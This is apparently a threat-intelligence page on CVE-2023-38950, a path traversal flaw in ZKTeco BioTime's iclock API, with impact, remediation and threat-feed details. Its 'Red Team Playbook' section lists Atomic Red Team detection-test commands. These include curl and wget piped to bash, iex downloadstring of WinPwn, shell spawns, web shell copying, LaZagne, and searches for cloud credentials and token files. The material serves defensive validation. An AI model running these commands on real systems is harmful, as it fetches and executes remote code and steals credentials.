CVE-2023-38950
Overview
This vulnerability is a path traversal flaw located in the iclock API component of ZKTeco BioTime software. The root cause is insufficient validation of user-supplied input, allowing crafted payloads to manipulate file path parameters. This improper sanitization enables unauthorized access to arbitrary files on the system through directory traversal sequences.
Vulnerability Description
A path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 allows unauthenticated attackers to read arbitrary files via supplying a crafted payload. This vulnerability was fixed in version 9.0.120240617.19506 of ZKBioTime.
Impact
An unauthenticated attacker can exploit this vulnerability to read sensitive files on the affected system, potentially disclosing configuration files, credentials, or other confidential data. This can lead to information disclosure that aids further attacks or compromises system integrity. The attack requires no authentication or user interaction, increasing the risk of automated exploitation and data breaches.
Solution
Upgrade ZKTeco BioTime to version 9.0.120240617.19506 or later, where the path traversal vulnerability in the iclock API has been addressed. Refer to the vendor advisory and patch release notes available through Claroty’s Team82 disclosure dashboard for detailed remediation instructions: https://claroty.com/team82/disclosure-dashboard/cve-2023-38950
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The identified vulnerability in the iclock API of ZKTeco BioTime v8.5.5 is characterized as a path traversal flaw. This type of vulnerability allows an attacker to manipulate file paths in such a way that they can access files outside of the intended directory structure. By sending a specially crafted payload, an unauthenticated user can exploit this weakness to read arbitrary files on the server. The lack of proper input validation and sanitization in the API is the primary factor that enables this security issue, as it fails to restrict access to sensitive files that should remain protected from unauthorized access.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage tools to automate requests to the API, injecting path traversal sequences such as "../" to navigate the file system. This could lead to the exposure of critical configuration files, user data, or even system binaries, depending on the server's configuration and the privileges assigned to the web application. Scenarios may include retrieving sensitive information such as database credentials or application secrets, which can be further used to escalate privileges or launch more sophisticated attacks against the infrastructure.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on ZKTeco BioTime for biometric time and attendance tracking. The exposure of sensitive files can lead to data breaches, compromising employee privacy and potentially leading to regulatory penalties if personal data is involved. Furthermore, the ability to read arbitrary files can provide attackers with the information necessary to conduct further attacks, such as SQL injection or remote code execution, thereby increasing the overall business risk. Organizations may also face reputational damage, loss of customer trust, and financial losses due to operational disruptions or remediation efforts.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including penetration testing and code reviews, can help identify and remediate such vulnerabilities before they are exploited. Additionally, updating to the latest version of ZKTeco BioTime, which addresses this flaw, is crucial. Organizations should also employ web application firewalls (WAFs) that can detect and block malicious requests attempting to exploit path traversal vulnerabilities. Furthermore, implementing strict access controls and file permissions can limit the exposure of sensitive files, reducing the potential impact of such vulnerabilities.
In conclusion, the path traversal vulnerability in the iclock API of ZKTeco BioTime v8.5.5 poses a serious threat to organizations utilizing this software. The potential for unauthorized access to sensitive files highlights the importance of robust security practices, including regular updates, thorough testing, and proactive monitoring. By adopting comprehensive detection and mitigation strategies, organizations can protect themselves from the risks associated with this and similar vulnerabilities, ensuring the integrity and confidentiality of their data.
CSURFACE threat intelligence has identified a slight increase in activity related to CVE-2023-38950, reflecting a modest uptick in attempts to exploit the path traversal vulnerability within ZKTeco BioTime’s iclock API. Although no new exploit techniques or ransomware associations have emerged, this subtle rise in detection signals a growing interest among threat actors in leveraging this flaw for unauthorized file access. Our telemetry indicates that while the overall exploitation trend remains stable, the increased probing could foreshadow more aggressive targeting or integration into broader attack campaigns. Consequently, the risk posture for organizations running affected versions of BioTime should be considered elevated, underscoring the need for heightened vigilance despite the absence of novel exploit developments.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zkteco | Biotime | All |
cpe:2.3:a:zkteco:biotime:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-38950 |
| zkteco.com |
GitHub CVE
|
http://zkteco.com |
| claroty.com |
GitHub CVE
|
https://claroty.com/team82/disclosure-dashboard/cve-2023-38950 |
| sploitus.com |
NVD API
Exploit
|
https://sploitus.com/exploit?id=PACKETSTORM:177859 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-38950 |
| fortinet.com |
NVD API
Technical Description
|
https://www.fortinet.com/content/dam/fortinet/assets/reports/report-incident-response-middle-east.pdf |